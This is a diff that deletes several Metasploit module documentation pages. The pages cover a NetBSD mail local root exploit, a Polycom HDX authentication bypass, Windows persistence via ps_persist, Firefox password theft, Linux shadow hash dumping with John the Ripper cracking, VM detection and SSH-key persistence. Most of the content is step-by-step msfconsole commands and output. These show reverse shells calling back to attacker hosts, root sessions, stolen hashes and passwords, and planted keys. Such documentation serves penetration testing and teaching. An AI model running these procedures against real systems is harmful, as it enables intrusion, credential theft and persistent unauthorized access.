-[*] Writing Payload to /tmp/zrWqhXpL
-[*] Max line length is 131073
-[*] /usr/bin/printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
-[*] printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
-[*] /usr/bin/printf %b '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
-[*] printf %b '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
-[*] perl -e 'print("\0\377\376\101\102\103\104\177\45\45\15\12")' Failed: "perl: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
-[*] gawk 'BEGIN {ORS="";print "\x00\xff\xfe\x41\x42\x43\x44\x7f\x25\x25\x0d\x0a"}' </dev/null Failed: "gawk: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
-[*] echo '00fffe414243447f25250d0a'|xxd -p -r Failed: "xxd: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
-[*] echo -ne '\x00\xff\xfe\x41\x42\x43\x44\x7f\x25\x25\x0d\x0a' Failed: "-ne \\x00\\xff\\xfe\\x41\\x42\\x43\\x44\\x7f\\x25\\x25\\x0d\\x0a\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
-[-] Exploit failed: RuntimeError Can't find command on the victim for writing binary data
-[*] Exploit completed, but no session was created.
-```
-* cmd/unix/reverse_awk - `awk: syntax error at source line 1`
-* cmd/unix/reverse_bash - `./bsd.payload: 1: Syntax error: Bad fd number`
-* cmd/unix/reverse_bash_telnet_ssl - `$ telnet: unknown option -- z`
-* cmd/unix/reverse_ssl_double_telnet - `$ telnet: unknown option -- z`
-* cmd/unix/reverse_lua - `lua: (command line):1: module 'socket' not found`
-* netcat, node, perl, php, python, php, ruby, zsh - all not installed by default
-* bsd/* didn't seem to work either, maybe its for freebsd?
-
-Payloads that did work:
-* cmd/unix/reverse_openssl
-
-## Verification Steps
-
-  1. Start msfconsole
-  2. Get an initial shell
-    1. Create working shell, scp it over
-```
-./msfvenom -p cmd/unix/reverse_openssl lhost=172.16.152.1 -f raw -o /tmp/bsd.payload
-scp /tmp/bsd.payload user@172.16.152.128:/tmp/
-```
-    2. Setup msf to handle
-```
-use exploit/multi/handler
-set payload cmd/unix/reverse_openssl
-set lhost 172.16.152.1
-exploit
-```
-    3. Run the shell from NetBSD
-```
-$ cd /tmp
-$ ls
-bsd.payload
-$ chmod +x bsd.payload 
-$ ./bsd.payload 
-$ WARNING: can't open config file: /etc/openssl/openssl.cnf
-depth=0 CN = vgekg
-verify error:num=18:self signed certificate
-verify return:1
-depth=0 CN = vgekg
-verify return:1
-```
-    4. Receive the shell and background it
-```
-[*] Started reverse double SSL handler on 172.16.152.1:4444 
-[*] Starting the payload handler...
-[*] Accepted the first client connection...
-[*] Accepted the second client connection...
-[*] Command: echo NwNHAEiJioYIvn4M;
-[*] Writing to socket A
-[*] Writing to socket B
-[*] Reading from sockets...
-[*] Reading from socket A
-[*] A: "NwNHAEiJioYIvn4M\n"
-[*] Matching...
-[*] B is input...
-[*] Command shell session 1 opened (172.16.152.1:4444 -> 172.16.152.128:65534) at 2016-08-25 19:58:39 -0400
-^Z
-Background session 1? [y/N]  y
-```
-  3. Do: `use exploit/unix/local/netbsd_mail_local`
-  4. Do: `set payload cmd/unix/reverse_openssl`
-  5. Do: `set lhost 172.16.152.1`
-  6. Do: `set verbose true`
-  7. Do: `set session 1`
-  8. Do: `exploit`
-  9. You should get a *root* shell.
-
-## Options
-
-  **ATRUNPATH**
-  File location of atrun, defaults to `/usr/libexec/atrun`
-  
-  **MAILDIR**
-  Location of mail folder, defaults to `/var/mail`
-  
-  **WritableDir**
-  Location of a writable directory for our payload, defaults to `/tmp`
-  
-  **ListenerTimeout**
-  Since this exploit utilized a cron which has a 10min timer, the listener timeout needs to be 10min + padding.  Defaults to `603` seconds (10min, 3sec)
-
-## Scenarios
-
-  Here is a run against a virgin install of `NetBSD  7.0.1 NetBSD 7.0.1 (GENERIC.201605221355Z) amd64` (from the unofficial link at the top)
-  
-  In this example, I got lucky and only had to wait ~1min for the cron to hit, which is every 10min by default
-
-  1. Get an initial shell
-    1. Create working shell, scp it over
-```
-./msfvenom -p cmd/unix/reverse_openssl lhost=172.16.152.1 -f raw -o /tmp/bsd.payload
-scp /tmp/bsd.payload user@172.16.152.128:/tmp/
-```
-    2. Setup msf to handle
-```
-use exploit/multi/handler
-set payload cmd/unix/reverse_openssl
-set lhost 172.16.152.1
-exploit
-```
-    3. Run the shell from NetBSD
-```
-$ cd /tmp
-$ ls
-bsd.payload
-$ chmod +x bsd.payload 
-$ ./bsd.payload 
-$ WARNING: can't open config file: /etc/openssl/openssl.cnf
-depth=0 CN = vgekg
-verify error:num=18:self signed certificate
-verify return:1
-depth=0 CN = vgekg
-verify return:1
-```
-    4. Receive the shell and background it
-```
-[*] Started reverse double SSL handler on 172.16.152.1:4444 
-[*] Starting the payload handler...
-[*] Accepted the first client connection...
-[*] Accepted the second client connection...
-[*] Command: echo NwNHAEiJioYIvn4M;
-[*] Writing to socket A
-[*] Writing to socket B
-[*] Reading from sockets...
-[*] Reading from socket A
-[*] A: "NwNHAEiJioYIvn4M\n"
-[*] Matching...
-[*] B is input...
-[*] Command shell session 1 opened (172.16.152.1:4444 -> 172.16.152.128:65534) at 2016-08-25 19:58:39 -0400
-^Z
-Background session 1? [y/N]  y
-```
-  2. Run the exploit
-```
-msf exploit(netbsd_mail_local) > set payload cmd/unix/reverse_openssl
-payload => cmd/unix/reverse_openssl
-msf exploit(netbsd_mail_local) > set lhost 172.16.152.1
-lhost => 172.16.152.1
-msf exploit(netbsd_mail_local) > set verbose true
-verbose => true
-msf exploit(netbsd_mail_local) > set session 1
-session => 1
-msf exploit(netbsd_mail_local) > exploit
-[*] Started reverse double SSL handler on 172.16.152.1:4444 
-[*] Writing Payload to /tmp/pjDkvmGg
-[*] Max line length is 131073
-[*] Writing 176 bytes in 1 chunks of 618 bytes (octal-encoded), using printf
-[*] Writing exploit to /tmp/GHIKGOWX.c
-[*] Max line length is 131073
-[*] Writing 4898 bytes in 1 chunks of 17162 bytes (octal-encoded), using printf
-[*] Compiling /tmp/GHIKGOWX.c via gcc
-[*] Starting the payload handler...
-[*] Executing at 2016-08-25 19:59:04 -0400.  May take up to 10min for callback
-[*] Accepted the first client connection...
-[*] Accepted the second client connection...
-[*] Command: echo X6C4UIDx4zmwM0DJ;
-[*] Writing to socket A
-[*] Writing to socket B
-[*] Reading from sockets...
-[*] Reading from socket A
-[*] A: "X6C4UIDx4zmwM0DJ\n"
-[*] Matching...
-[*] B is input...
-[*] Command shell session 2 opened (172.16.152.1:4444 -> 172.16.152.128:65532) at 2016-08-25 20:00:02 -0400
-[*] 2016-08-25 20:00:02 -0400
-[*] Remember to run: chown root:wheel /usr/libexec/atrun
-[+] Deleted /tmp/pjDkvmGg
-[!] This exploit may require manual cleanup of '/tmp/pjDkvmGg' on the target
-[!] This exploit may require manual cleanup of '/tmp/GHIKGOWX' on the target
-[!] This exploit may require manual cleanup of '/tmp/GHIKGOWX.out' on the target
-1633029467
-TkBWZEPqsRvYvmwNaTcjImhcSzZHOAtY
-true
-JUqfyioWthnpvyxRJAZosSGQjnLHqPUB
-sHXbQbHqFIbnZGoFWlZoppGprWyKwFCr
-nDpSrEmQhDuVSxIpILWCOABbMOIAWUTx
-whoami
-root
-```
@@ -1,36 +0,0 @@
-## Vulnerable Application
-
-This module exploits the Polycom HDX video endpoints with software <= 3.0.5.
-It was tested on a Polycom HDX 7000 running software version 3.0.3. Telnet port
-23 should be accessible, as it is with the factory default configuration.
-
-## Verification Steps
-
-A successful check of the exploit will look like this:
-
-```
-msf exploit(psh_auth_bypass) > use exploit/unix/misc/psh_auth_bypass
-msf exploit(psh_auth_bypass) > run
-
-[*] Started reverse double SSL handler on 192.168.1.120:4444
-[*] 192.168.1.155:23 - Starting Authentication bypass with 6 threads with 100 max connections
-[+] 192.168.1.155:23 - 192.168.1.155:23 Successfully exploited the authentication bypass flaw
-[+] 192.168.1.155:23 - Sending payload of 178 bytes to 192.168.1.155:40186...
-[*] Accepted the first client connection...
-[*] Accepted the second client connection...
-[*] Command: echo xInxktvgUmm7hPyh;
-[*] Writing to socket A
-[*] Writing to socket B
-[*] Reading from sockets...
-[*] Reading from socket B
-[*] B: "xInxktvgUmm7hPyh\n"
-[*] Matching...
-[*] A is input...
-[*] Command shell session 1 opened (192.168.1.120:4444 -> 192.168.1.155:37728) at 2016-08-01 13:49:06 -0500
-[*] 192.168.1.155:23 - Shutting down payload stager listener...
-
-whoami
-root
-uname -a
-Linux polycom.lan 2.6.33.3-rt17.p2.25 #1 PREEMPT RT Wed Aug 3 14:08:40 CDT 2011 ppc unknown
-```
@@ -1,63 +0,0 @@
-
-## Example Usage
-
-```
-msf exploit(handler) > use exploit/windows/local/ps_persist
-msf exploit(ps_persist) > set session -1
-session => -1
-msf exploit(ps_persist) > set payload windows/meterpreter/reverse_tcp
-payload => windows/meterpreter/reverse_tcp
-msf exploit(ps_persist) > set lhost 192.168.56.1
-lhost => 192.168.56.1
-msf exploit(ps_persist) > set lport 4445
-lport => 4445
-msf exploit(ps_persist) > show options
-
-Module options (exploit/windows/local/ps_persist):
-
-   Name           Current Setting  Required  Description
-   ----           ---------------  --------  -----------
-   OUTPUT_TARGET                   no        Name and path of the generated executable, default random, omit extension
-   SESSION        -1               yes       The session to run this module on.
-   START_APP      true             no        Run EXE/Install Service
-   SVC_DNAME      MsfDynSvc        no        Display Name to use for the Windows Service
-   SVC_GEN        false            no        Build a Windows service, which defaults to running as localsystem
-   SVC_NAME       MsfDynSvc        no        Name to use for the Windows Service
-
-
-Payload options (windows/meterpreter/reverse_tcp):
-
-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
-   LHOST                      yes       The listen address
-   LPORT     4445             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Universal
-
-
-msf exploit(ps_persist) > run
-
-[*] Started reverse TCP handler on 192.168.56.1:4445
-[+]  - Bytes remaining: 9664
-[+]  - Bytes remaining: 1664
-[+] Payload successfully staged.
-[*] Sending stage (957999 bytes) to 192.168.56.101
-[+] Finished!
-[*] Meterpreter session 2 opened (192.168.56.1:4445 -> 192.168.56.101:49974) at 2016-10-08 18:42:36 -0500
-
-meterpreter > sysinfo
-Computer        : DESKTOP-B8ALP1P
-OS              : Windows 10 (Build 14393).
-Architecture    : x64 (Current Process is WOW64)
-System Language : en_US
-Domain          : WORKGROUP
-Logged On Users : 2
-Meterpreter     : x86/win32
-```
-
@@ -1,68 +0,0 @@
-## Vulnerable Application
-
-  This post-exploitation module allows the collection of saved Firefox passwords from a Firefox privileged javascript shell.
-
-## Verification Steps
-
-  1. Start `msfconsole`
-  2. Get privileged javascript session
-  3. Do: `use post/firefox/gather/passwords`
-  4. Do: `set SESSION <session id>`
-  5. Do: `run`
-  6. You should be able to see all saved Firefox passwords in the loot file in JSON format
-
-## Options
-
-  - **SESSION** - The session to run the module on.
-
-  - **TIMEOUT** - Maximum time (seconds) to wait for a response. The default value is 90.
-
-## Scenarios
-
-  **Obtain a privileged javascript shell and gather saved Firefox passwords**
-
-  To be able to use this module, a privileged javascript shell is needed. It can be obtained by using a javascript privilege exploit like `exploit/multi/browser/firefox_proto_crmfrequest`, `exploit/multi/browser/firefox_proxy_prototype` or others.
-  In the example case of the `firefox_proto_crmfrequest` exploit use `set TARGET 0` to use a javascript shell.
-
-  ```
-  msf > use exploit/multi/browser/firefox_proto_crmfrequest
-  msf exploit(firefox_proto_crmfrequest) > set TARGET 0
-  TARGET => 0
-  msf exploit(firefox_proto_crmfrequest) > run
-  [*] Exploit running as background job.
-  msf exploit(firefox_proto_crmfrequest) >
-  [*] Started reverse TCP handler on 192.168.2.117:4444
-  [*] Using URL: http://0.0.0.0:8080/nbHsSeXAfjr
-  [*] Local IP: http://192.168.2.117:8080/nbHsSeXAfjr
-  [*] Server started.
-  [*] Gathering target information for 192.168.2.117
-  [*] Sending HTML response to 192.168.2.117
-  [*] Sending HTML
-  [*] Sending the malicious addon
-  [*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.117:35100) at 2016-10-08 00:33:09 +0200
-
-  msf exploit(firefox_proto_crmfrequest) > use post/firefox/gather/passwords
-  msf post(passwords) > set SESSION 1
-  SESSION => 1
-  msf post(passwords) > run
-
-  [*] Running the privileged javascript...
-  [+] Saved 1 passwords to /home/user/.msf4/loot/20161008003433_default_192.168.2.117_firefox.password_070261.txt
-  [*] Post module execution completed
-  ```
-
-  The loot file then contains all passwords in json format, like so:
-
-  ```
-  [  
-     {  
-        "password":"1234",
-        "passwordField":"pwd",
-        "username":"admin",
-        "usernameField":"log",
-        "httpRealm":"",
-        "formSubmitURL":"https://example.com",
-        "hostname":"https://example.com"
-     }
-  ]
-  ```
@@ -1,130 +0,0 @@
-## Locations Checked
-
-There are many locations that are checked for having evidence of being a virtual machine.  The follow is a list of them:
-
-1. (with root access) `/usr/sbin/dmidecode`
-2. `/sbin/lsmod`
-3. `/proc/scsi/scsi`
-4. `cat /proc/ide/hd*/model`
-5. `lspci`
-6. `ls -1 /sys/bus`
-7. `lscpu`
-8. `dmesg`
-
-## Verification Steps
-
-  1. Start msfconsole
-  2. Get a session via exploit of your choice
-  3. Do: `use post/linux/gather/checkvm`
-  4. Do: `set session <session>`
-  5. Do: `run`
-  6. You should get feedback if a virtual machine environment was detected
-
-## Options
-
-  **SESSION**
-
-  Which session to use, which can be viewed with `sessions -l`
-
-## Scenarios
-
-  Typical run against Kali with only one user (root), using ssh_login for initial shell
-
-```
-msf > use auxiliary/scanner/ssh/ssh_login
-msf auxiliary(ssh_login) > set username root
-username => root
-msf auxiliary(ssh_login) > set password "test"
-password => example_password
-msf auxiliary(ssh_login) > set rhosts 127.0.0.1
-rhosts => 127.0.0.1
-msf auxiliary(ssh_login) > exploit
-
-[*] SSH - Starting bruteforce
-[-] SSH - Could not connect: The connection was refused by the remote host (127.0.0.1:22).
-[!] No active DB -- Credential data will not be saved!
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > exploit
-
-[*] SSH - Starting bruteforce
-[+] SSH - Success: 'root:test' 'uid=0(root) gid=0(root) groups=0(root) Linux k 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux '
-[!] No active DB -- Credential data will not be saved!
-[*] Command shell session 1 opened (127.0.0.1:41521 -> 127.0.0.1:22) at 2016-09-14 00:14:36 -0400
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > use post/linux/gather/checkvm 
-msf post(checkvm) > set session 1
-session => 1
-msf post(checkvm) > run
-
-[*] Gathering System info ....
-[+] This appears to be a 'Xen' virtual machine
-[*] Post module execution completed
-  ```
-A non-virtual machine will have the following output
-```
-msf > use auxiliary/scanner/ssh/ssh_login
-msf auxiliary(ssh_login) > set username root
-username => root
-msf auxiliary(ssh_login) > set password "test"
-password => example_password
-msf auxiliary(ssh_login) > set rhosts 127.0.0.1
-rhosts => 127.0.0.1
-msf auxiliary(ssh_login) > exploit
-
-[*] SSH - Starting bruteforce
-[-] SSH - Could not connect: The connection was refused by the remote host (127.0.0.1:22).
-[!] No active DB -- Credential data will not be saved!
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > exploit
-
-[*] SSH - Starting bruteforce
-[+] SSH - Success: 'root:test' 'uid=0(root) gid=0(root) groups=0(root) Linux k 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux '
-[!] No active DB -- Credential data will not be saved!
-[*] Command shell session 1 opened (127.0.0.1:41521 -> 127.0.0.1:22) at 2016-09-14 00:15:36 -0400
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > use post/linux/gather/checkvm 
-msf post(checkvm) > set session 1
-session => 1
-msf post(checkvm) > run
-
-[*] Gathering System info ....
-[*] This does not appear to be a virtual machine
-[*] Post module execution completed
-  ```
-And a VMwave virtual machine
-```
-msf > use auxiliary/scanner/ssh/ssh_login
-msf auxiliary(ssh_login) > set username root
-username => root
-msf auxiliary(ssh_login) > set password "test"
-password => example_password
-msf auxiliary(ssh_login) > set rhosts 127.0.0.1
-rhosts => 127.0.0.1
-msf auxiliary(ssh_login) > exploit
-
-[*] SSH - Starting bruteforce
-[-] SSH - Could not connect: The connection was refused by the remote host (127.0.0.1:22).
-[!] No active DB -- Credential data will not be saved!
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > exploit
-
-[*] SSH - Starting bruteforce
-[+] SSH - Success: 'root:test' 'uid=0(root) gid=0(root) groups=0(root) Linux k 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux '
-[!] No active DB -- Credential data will not be saved!
-[*] Command shell session 1 opened (127.0.0.1:41521 -> 127.0.0.1:22) at 2016-09-14 00:18:36 -0400
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > use post/linux/gather/checkvm 
-msf post(checkvm) > set session 1
-session => 1
-msf post(checkvm) > run
-
-[*] Gathering System info ....
-[+] This appears to be a 'VMware' virtual machine
-[*] Post module execution completed
-```
@@ -1,98 +0,0 @@
-## Verification Steps
-
-  1. Start msfconsole
-  2. Get a session via exploit of your choice
-  3. Do: `use post/linux/gather/hashdump`
-  4. Do: `set session <session>`
-  5. Do: `run`
-  6. You should see the contents of the shadow file
-
-## Options
-
-  **SESSION**
-
-  Which session to use, which can be viewed with `sessions -l`
-
-## Scenarios
-
-### Obtain Hashes
-
-  Typical run against Kali, using ssh_login for initial shell
-
-```
-msf > use auxiliary/scanner/ssh/ssh_login
-msf auxiliary(ssh_login) > set username root
-username => root
-msf auxiliary(ssh_login) > set password "test"
-password => example_password
-msf auxiliary(ssh_login) > set rhosts 127.0.0.1
-rhosts => 127.0.0.1
-msf auxiliary(ssh_login) > exploit
-
-[*] SSH - Starting bruteforce
-[-] SSH - Could not connect: The connection was refused by the remote host (127.0.0.1:22).
-[!] No active DB -- Credential data will not be saved!
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > exploit
-
-[*] SSH - Starting bruteforce
-[+] SSH - Success: 'root:test' 'uid=0(root) gid=0(root) groups=0(root) Linux k 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux '
-[!] No active DB -- Credential data will not be saved!
-[*] Command shell session 1 opened (127.0.0.1:41521 -> 127.0.0.1:22) at 2016-09-14 00:12:36 -0400
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > use post/linux/gather/hashdump 
-msf post(hashdump) > set session 1
-session => 1
-msf post(hashdump) > exploit
-
-[+] root:$6$eMImGFXb$3eYV4g315Qf2NA1aQ72yMwnM68PapXfCoP74kAb5vmQoqOz7sDTJQEMPUNNjZSEz.E4tXebqvt2iR3W50L8NX.:0:0:root:/root:/bin/bash
-[+] test:$6$gsSmzVTM$vxnEAvs2jEhuFtq0yzgCm.p49RmirvyI6HvPXgbLZCtg1sLp5Q2U82U6Gv6i5hz/pcsz882rnLRAyIL24h3/N.:1000:1000:test,,,:/home/test:/bin/bash
-[+] Unshadowed Password File: /root/.msf4/loot/20160914003144_default_127.0.0.1_linux.hashes_080983.txt
-[*] Post module execution completed
-  ```
-
-  This module only works when you are root or have root permisions.  If you only have user permission, expect feedback:
-
-  ```
-msf > use auxiliary/scanner/ssh/ssh_login
-msf auxiliary(ssh_login) > set username test
-username => test
-msf auxiliary(ssh_login) > set password test
-password => test
-msf auxiliary(ssh_login) > set rhosts 127.0.0.1
-rhosts => 127.0.0.1
-msf auxiliary(ssh_login) > exploit
-
-[*] SSH - Starting bruteforce
-[+] SSH - Success: 'test:test' 'uid=1000(test) gid=1000(test) groups=1000(test) Linux k 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux '
-[!] No active DB -- Credential data will not be saved!
-[*] Command shell session 1 opened (127.0.0.1:44823 -> 127.0.0.1:22) at 2016-09-14 00:24:17 -0400
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > use post/linux/gather/hashdump
-msf post(hashdump) > set session 1
-session => 1
-msf post(hashdump) > exploit
-
-[-] You must run this module as root!
-[*] Post module execution completed
-  ```
-  ### Crack Hashes (John the Ripper)
-  
-The stored file can then have a password cracker used against it.  In this scenario, we'll use john (the ripper).
-```
-root@k:/git/metasploit-framework# john /root/.msf4/loot/20160914003144_default_127.0.0.1_linux.hashes_080983.txt
-Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
-Use the "--format=crypt" option to force loading these as that type instead
-Using default input encoding: UTF-8
-Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
-Press 'q' or Ctrl-C to abort, almost any other key for status
-test             (test)
-test             (root)
-2g 0:00:00:00 DONE 1/3 (2016-09-14 00:32) 40.00g/s 460.0p/s 480.0c/s 480.0C/s test..oo
-Use the "--show" option to display all of the cracked passwords reliably
-Session completed
-
-```
@@ -1,541 +0,0 @@
-### Creating A Testing Environment
-
-  This module has been tested against:
-
-1. Kali Rolling
-2. Ubuntu 16.04
-3. Centos 6
-4. Fedora 20
-5. FreeBSD 9
-
-## Verification Steps
-
-  1. Start msfconsole
-  2. Exploit a box via whatever method
-  4. Do: `use post/linux/manage/sshkey_persistence`
-  5. Do: `set session #`
-  6. Optional Do: `set username`
-  7. Do: `set verbose true`
-  8. Optional Do: `Set sshd_config`
-  9. Do: `exploit`
-
-
-## Options
-
-  **sshd_config**
-
-  Location of the sshd_config file on the remote system.  We use this to determine if the authorized_keys file location has changed on the system.  If it hasn't, we default to .ssh/authorized_keys
-
-  **username**
-
-  If set, we only write our key to this user.  If not, we'll write to all users
-
-  **PubKey**
-
-  A public key to use.  If not provided, a pub/priv key pair is generated automatically
-
-## Scenarios
-
-### Ubuntu 16.04 (user level)
-
-Get initial access
-
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] SSH - Starting bruteforce
-    [+] SSH - Success: 'tiki:tiki' 'uid=1000(tiki) gid=1000(tiki) groups=1000(tiki),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare) Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
-    [!] No active DB -- Credential data will not be saved!
-    [*] Command shell session 1 opened (192.168.2.229:38886 -> 192.168.2.190:22) at 2016-06-19 09:52:48 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-Use the post module to write the ssh key
-
-    msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
-    msf post(sshkey_persistence) > set session 1
-    session => 1
-    msf post(sshkey_persistence) > set verbose true
-    verbose => true
-    msf post(sshkey_persistence) > set user tiki
-    user => tiki
-    msf post(sshkey_persistence) > set CreateSSHFolder true
-    CreateSSHFolder => true
-    msf post(sshkey_persistence) > exploit
-    
-    [*] Checking SSH Permissions
-    [+] Pubkey set to yes
-    [*] Authorized Keys File: .ssh/authorized_keys
-    [*] Added User SSH Path: /home/tiki/.ssh
-    [*] Attempting to create ssh folders that don't exist
-    [+] Storing new private key as /root/.msf4/loot/20160619095250_default_192.168.2.190_id_rsa_425588.txt
-    [*] Adding key to /home/tiki/.ssh/authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 761 bytes in 1 chunks of 2886 bytes (octal-encoded), using printf
-    [+] Key Added
-    [!] No active DB -- Credential data will not be saved!
-    [*] Post module execution completed
-
-Verify our access works
-
-    msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey 
-    msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.190
-    rhosts => 192.168.2.190
-    msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
-    key_path => /root/.msf4/loot/
-    msf auxiliary(ssh_login_pubkey) > set username tiki
-    username => tiki
-    msf auxiliary(ssh_login_pubkey) > run
-    
-    [*] 192.168.2.190:22 SSH - Testing Cleartext Keys
-    [*] SSH - Testing 2 keys from /root/.msf4/loot
-    [+] SSH - Success: 'tiki:-----BEGIN RSA PRIVATE KEY-----
-    ...snip...
-    7m+il2AWyuPWOWEnpXRur3knruE2k97ObMH92FeI8SYaIThvqNUL
-    -----END RSA PRIVATE KEY-----
-    ' 'uid=1000(tiki) gid=1000(tiki) groups=1000(tiki),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare) Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
-    [!] No active DB -- Credential data will not be saved!
-    [*] Command shell session 2 opened (192.168.2.229:42580 -> 192.168.2.190:22) at 2016-06-19 09:56:22 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-If you try to run for a user you don't have permissions for
-
-    msf post(sshkey_persistence) > exploit
-
-    [*] Checking SSH Permissions
-    [+] Pubkey set to yes
-    [*] Authorized Keys File: .ssh/authorized_keys
-    [*] Added: /root/.ssh
-    [*] Attempting to create ssh folders that don't exist
-    [+] /root/.ssh
-    [*] Creating /root/.ssh folder
-    [-] No users found with a .ssh directory
-    [*] Post module execution completed
-
-### CentOS 6 (user level)
-ssh keys must be enabled in sshd_config.
-
-Get Initial Access
-
-    msf > use auxiliary/scanner/ssh/ssh_login
-    msf auxiliary(ssh_login) > set username user
-    username => user
-    msf auxiliary(ssh_login) > set password password
-    password => password
-    msf auxiliary(ssh_login) > set rhosts 192.168.4.62
-    rhosts => 192.168.4.62
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] SSH - Starting bruteforce
-    [+] SSH - Success: 'user:password' 'uid=500(user) gid=500(user) groups=500(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux '
-    [!] No active DB -- Credential data will not be saved!
-    [*] Command shell session 1 opened (192.168.2.229:39289 -> 192.168.4.62:22) at 2016-06-19 15:27:27 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-Use the post module to write the ssh key
-
-    msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
-    msf post(sshkey_persistence) > set session 1
-    session => 1
-    msf post(sshkey_persistence) > set verbose true
-    verbose => true
-    msf post(sshkey_persistence) > set user user
-    user => user
-    msf post(sshkey_persistence) > exploit
-    
-    [*] Checking SSH Permissions
-    [*] Authorized Keys File: .ssh/authorized_keys
-    [*] Added User SSH Path: /home/user/.ssh
-    [*] Attempting to create ssh folders that don't exist
-    [+] Storing new private key as /root/.msf4/loot/20160619152757_default_192.168.4.62_id_rsa_633695.txt
-    [*] Creating /home/user/.ssh/authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1447 bytes (octal-encoded), using printf
-    [+] Key Added
-    [!] No active DB -- Credential data will not be saved!
-    [*] Post module execution completed
-
-Verify our access works
-
-    msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey 
-    msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.4.62
-    rhosts => 192.168.4.62
-    msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
-    key_path => /root/.msf4/loot/
-    msf auxiliary(ssh_login_pubkey) > set username user
-    username => user
-    msf auxiliary(ssh_login_pubkey) > run
-    
-    [*] 192.168.4.62:22 SSH - Testing Cleartext Keys
-    [*] SSH - Testing 6 keys from /root/.msf4/loot
-    [+] SSH - Success: 'user:-----BEGIN RSA PRIVATE KEY-----
-    MIIEpAIBAAKCAQEA8xtiDZrE6XgkOJaatg+TvUcrEr92/GDSZUtEqO9RvvvPO1Yt
-    ...snip...
-    Ubz5hiBypg1/C2TMB9jH3QLKmT66Te7rfym7rOBIgIJKivs5JLZe7w==
-    -----END RSA PRIVATE KEY-----
-    ' 'uid=500(user) gid=500(user) groups=500(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux '
-    [!] No active DB -- Credential data will not be saved!
